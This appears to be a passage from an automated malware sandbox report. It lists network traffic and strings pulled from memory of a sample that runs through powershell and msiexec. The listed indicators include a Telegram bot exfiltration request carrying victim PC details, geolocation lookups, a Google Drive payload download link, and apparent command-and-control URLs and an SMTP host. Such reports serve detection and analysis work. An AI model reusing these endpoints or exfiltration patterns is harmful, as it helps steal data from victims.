            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: smtp.ionos.es
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 22 Oct 2024 14:12:18 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 22 Oct 2024 14:12:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.geotrust.com/GeoTrustTLSRSACAG1.crt0
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdp.geotrust.com/GeoTrustTLSRSACAG1.crl0v
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3118373989.00000000242EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/C7T
            Source: powershell.exe, 00000004.00000002.2786466269.00000000078E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2786466269.000000000792C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
            Source: Sprawl.exe, Sprawl.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Sprawl.exe, Sprawl.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2747850355.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
            Source: powershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2725870722.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2754100744.0000000005371000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.ionos.es
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://status.geotrust.com0
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000002.00000002.2725870722.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2754100744.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 00000009.00000002.3378186894.0000000022AA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AD7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021F80000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000009.00000002.3362946153.0000000006F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.go
            Source: msiexec.exe, 00000008.00000002.3362918549.000000000657A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000704A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000009.00000002.3363263711.000000000704A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE
            Source: msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000008.00000002.3362918549.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2985704004.00000000065F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/U
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3362918549.00000000065D8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3362918549.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2985704004.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000708E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2747850355.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021EAC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.000000002295C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.000000002295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000009.00000002.3378186894.0000000022987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021EAC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021E67000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229CC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76$
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000009.00000002.3378186894.0000000022AD7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknown | Network traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknown | Network traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknown | Network traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknown | Network traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknown | Network traffic detected: HTTP traffic on port 50025 -> 443
